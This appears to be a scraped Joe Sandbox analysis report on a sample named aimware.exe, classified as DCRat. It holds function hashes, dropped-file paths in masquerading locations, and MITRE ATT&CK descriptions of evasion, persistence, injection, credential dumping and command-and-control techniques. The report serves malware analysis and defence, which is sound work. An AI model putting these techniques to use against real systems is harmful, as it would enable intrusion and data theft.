Instruction ID: 252b699e0e44a67b61b8802873338f4f272ed86368bc538af5e3bb393d2f1f4c
Opcode Fuzzy Hash: c076d318583c15811621b6786557a92134e3464c5c7e09af19b19d44a7b17dc8
Instruction Fuzzy Hash: 39D0A730B6094D4B8B0CB63D8858430F3D5FBAA6067D4927CE40BC3291ED25ECC6CB84

Function 00007FFD9BAB8820 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2965419537.00007FFD9BAB3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9bab3000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a6186c9382d1b0afa59ed7b9210a0d80fba28e6610cdf118d28a4f61f774001
Instruction ID: ac8b33491a2b18338dc0aebfe6c449439940d79eddc6b40e42e94cf7fbac3f92
Opcode Fuzzy Hash: 1a6186c9382d1b0afa59ed7b9210a0d80fba28e6610cdf118d28a4f61f774001
Instruction Fuzzy Hash: CBD02B41F1E95E16FB34A2FC28A53742BC2D392270F880378D05CC02D5DCCD04518302

Function 00007FFD9BA9267D Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2965419537.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9ba90000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b50ce901ae875d00469847bc6b57cfd48f27ae5e4136222b813b287e8369f418
Instruction ID: 9228f0632fca0e0c32be2caf171aa4e22f552416f5c88cb864f3c9d652d979a4
Opcode Fuzzy Hash: b50ce901ae875d00469847bc6b57cfd48f27ae5e4136222b813b287e8369f418
Instruction Fuzzy Hash: C6E01222F5D55A0AF3BCA3A81C363B89082AF98754F4A41B9B54EC72D3DD5C2D405357

Function 00007FFD9BE80B87 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2974113641.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9be80000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8023dd37684279d0a11aa8e95cdd79037e32bcecb8babbb69ea98a1aadbc306
Instruction ID: 528a7343d0e04122a39336475cea04ee56c7f984b4ad9af5d73a7bf91f150108
Opcode Fuzzy Hash: d8023dd37684279d0a11aa8e95cdd79037e32bcecb8babbb69ea98a1aadbc306
Instruction Fuzzy Hash: EFE0C251F1EBCA4FE7360AB008701783FA19F07346B0A00F6C85A8D2E3EA792E048321

Function 00007FFD9BAA4A07 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2965419537.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9baa0000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: caafc75bccc4d626e9344b6f4828711c605ff35942b0ce6db9da6086e27619d0
Instruction ID: 4cfea8ed714c9cd53ccead9ff6a048c941ff5c0b4e06b60bb06b7d2b4538ae97
Opcode Fuzzy Hash: caafc75bccc4d626e9344b6f4828711c605ff35942b0ce6db9da6086e27619d0
Instruction Fuzzy Hash: 80D05E24B0D94F8BE675AB8894B227E6292EF14300F120079F41EC31B7DF68EA528651

Function 00007FFD9BE8166B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2974113641.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9be80000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6a14f175c557224035bb14844bb2104616e9558e5c65c7ab2854a7dd321afba
Instruction ID: dbb7e6d16709a6bc9cc8c1d474c7a0063a3cbd93393c610a463bad753f7a43c4
Opcode Fuzzy Hash: d6a14f175c557224035bb14844bb2104616e9558e5c65c7ab2854a7dd321afba
Instruction Fuzzy Hash: DBD09210B0FE4B85F2384791413127915988F19300E2A0539C0AF519E1C93A7A416603

Function 00007FFD9BA92659 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2965419537.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9ba90000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8d6748570fa8e793d0259502998a6eef07ba244565570e07ae6a1d73019bca7
Instruction ID: e68f89581eb57a29ffff640bb43786ace7cb55f7aa8004575ec53afe04bf2569
Opcode Fuzzy Hash: d8d6748570fa8e793d0259502998a6eef07ba244565570e07ae6a1d73019bca7
Instruction Fuzzy Hash: CDC08C11F0C81E0AF229620408312BD00839F44B0CF8002B4E02DCA2CECC1D59020282

Function 00007FFD9BE85BCF Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2974113641.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ffd9be80000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 920c451c3c500a6abde984ee25ef3b9d0e3bce689a84b4b75b8d5b8eb0b1fc1e
Instruction ID: d2a92b7f759ab31fbfb11cad412025a6197720b25758fc939b8ec88643126ea6
Opcode Fuzzy Hash: 920c451c3c500a6abde984ee25ef3b9d0e3bce689a84b4b75b8d5b8eb0b1fc1e
Instruction Fuzzy Hash: 24C04C40F0EF8656EA3115E408A507D06E51B162407670572D526491E3DC5D6A055311

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report aimware.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Google\3734501469df7e

C:\Program Files (x86)\Google\wDyQbcxdSUUjszASb.exe

C:\Program Files (x86)\Windows Photo Viewer\3734501469df7e

C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

C:\Program Files\Microsoft Office 15\ClientX64\3734501469df7e

C:\Program Files\Microsoft Office 15\ClientX64\wDyQbcxdSUUjszASb.exe

C:\Program Files\Windows Defender\en-US\3734501469df7e

C:\Program Files\Windows Defender\en-US\wDyQbcxdSUUjszASb.exe

C:\Recovery\f3b6ecef712a24

Windows Analysis Report
aimware.exe

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre